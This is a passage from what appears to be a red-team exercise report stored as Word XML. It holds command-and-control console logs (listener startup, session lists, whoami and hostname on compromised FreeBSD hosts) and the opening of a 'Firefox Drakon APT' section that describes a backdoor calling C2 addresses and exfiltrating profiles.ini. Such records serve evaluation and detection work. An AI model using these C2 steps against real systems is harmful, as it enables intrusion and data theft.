    <w:p w14:paraId="532B38BC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F1         128.55.12.75:34919 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 10:25:19 2019        active 5586s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2C5BF7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F2         128.55.12.51:35518 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 10:47:39 2019        active 4246s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD0DA24" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434D4E86" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        A1        128.55.12.166:49789 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 11:51:30 2019        active 13136s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CA5468" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F1         128.55.12.75:34919 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 10:25:19 2019        active 18308s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7814D891" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F2         128.55.12.51:35518 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 10:47:39 2019        active 16968s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C53B1F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con F1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7379E542" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F1&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265CFC61" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] uid: 80 www</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584AE230" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F1&gt;hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD43A2E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ta1-cadets-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C8E262" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F1&gt;quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A1A41D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con F2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3421D68F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F2&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1131069E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] uid: 80 www</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D786A2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>hF2&gt;hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0754C747" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ta1-cadets-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6D9AC6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F2&gt;quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D78FAC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAF88FC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        A1        128.55.12.166:49789 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 11:51:30 2019        DEAD 13145s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7226FAAB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F1         128.55.12.75:34919 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 10:25:19 2019        DEAD 18324s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6B6B21" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F2         128.55.12.51:35518 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 10:47:39 2019        DEAD 16998s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF9B851" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="215" w:name="_pgezb06129nx" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="216" w:name="_Toc12600119"/>
      <w:bookmarkEnd w:id="215"/>
      <w:r>
        <w:t>Event Log 2 (Missed C2 Connections)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="216"/>
    </w:p>
    <w:p w14:paraId="4A20C169" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>FreeBSD/Clearscope oc2 check (new connections??)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A8A5A5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E7963E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7B8031" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@kududyn-ProLiant-SL170s-G6:/e5/oc2_cs# python ocMain.py --http 8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F1D66E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Must install flask to use snuggly, ignoring...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BC12E6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>projects/build_drakon.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2DF2B3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Default interface: 0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC47B25" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Listening for connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB5042B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            0.0.0.0:8888  [HTTP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6DDBA3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278FB2FD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ED26548" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## New connection received ##################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78845F08" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] [freebsd] [x64] [N/A] [N/A]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093EBAFC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Initializing new freebsd console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4697F970" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## NEW CONSOLE READY [F1] ####################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4917C0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42210754" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0822EE8C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## New connection received ##################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2619D8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] [freebsd] [x64] [N/A] [N/A]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BA5B05" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Initializing new freebsd console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F42A9B5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## NEW CONSOLE READY [F2] ####################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7544E5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CE0CB40" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E229B8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F1         128.55.12.51:31245 --&gt;   128.55.12.167:8888  [HTTP]  Fri May 17 10:17:15 2019        active 13502s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D675F04" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F2         128.55.12.51:29938 --&gt;   128.55.12.167:8888  [HTTP]  Fri May 17 10:19:03 2019        active 13394s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B5213A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con F1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC882D1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F1&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034F501D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] uid: 80 www</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C12741" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F1&gt;hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510B9D5D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ta1-cadets-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A0E4D5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F1&gt;main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4877965F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con F2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED08FEE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F2&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122E7A00" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] uid: 80 www</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0B11FE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F2&gt;hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBDF564" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ta1-cadets-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657BFF67" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F2&gt;main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6101F8D8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B45BEC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F1         128.55.12.51:31245 --&gt;   128.55.12.167:8888  [HTTP]  Fri May 17 10:17:15 2019        active 13540s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59374453" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F2         128.55.12.51:29938 --&gt;   128.55.12.167:8888  [HTTP]  Fri May 17 10:19:03 2019        active 13431s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38450AF4" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BC21492" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9C0E63" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con F1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E0D4A4" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F1&gt;quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4A67FA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con F2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D83B7D7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F2&gt;quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31307AAA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDE9125" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F1         128.55.12.51:31245 --&gt;   128.55.12.167:8888  [HTTP]  Fri May 17 10:17:15 2019        DEAD 13981s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAB54CD" w14:textId="695B6383" w:rsidR="00CE2C66" w:rsidRPr="00650FDF" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F2         128.55.12.51:29938 --&gt;   128.55.12.167:8888  [HTTP]  Fri May 17 1</w:t>
      </w:r>
      <w:r w:rsidR="00650FDF">
        <w:t>0:19:03 2019        DEAD 13876s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7C8730" w14:textId="59B04389" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="217" w:name="_Toc12600120"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>11:50 -- TA1 ClearScope 2 -- Firefox Drakon APT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="217"/>
    </w:p>
    <w:p w14:paraId="135AFDDA" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>The user browsed to a malicious www.nintendo.com, at which point the Firefox backdoor was accessed, triggering connections to 42.183.7.162:80 and 128.55.12.233:80 for C2.  The attacker got the hostname, username, and exfil’ed the file profiles.ini.  The connection was left open along with the CADETS connections from the previous attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C95DA1" w14:textId="3A6F3FB7" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="218" w:name="_atiqpguxi0mu" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="219" w:name="_Toc12600121"/>
      <w:bookmarkEnd w:id="218"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="219"/>
    </w:p>
    <w:p w14:paraId="5C199D43" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-clearscope-translate-test</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.114</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Android 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB300E2" w14:textId="70CD9F09" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="220" w:name="_96y018x1xsse" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="221" w:name="_Toc12600122"/>
      <w:bookmarkEnd w:id="220"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="221"/>
    </w:p>
    <w:p w14:paraId="3735CD5F" w14:textId="78D2B54C"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Firefox Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004F2ED9" w14:textId="1C28F2B9" w:rsidR="00A351B2" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Drakon APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17322D0B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="222" w:name="_Toc12600123"/>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="222"/>
    </w:p>
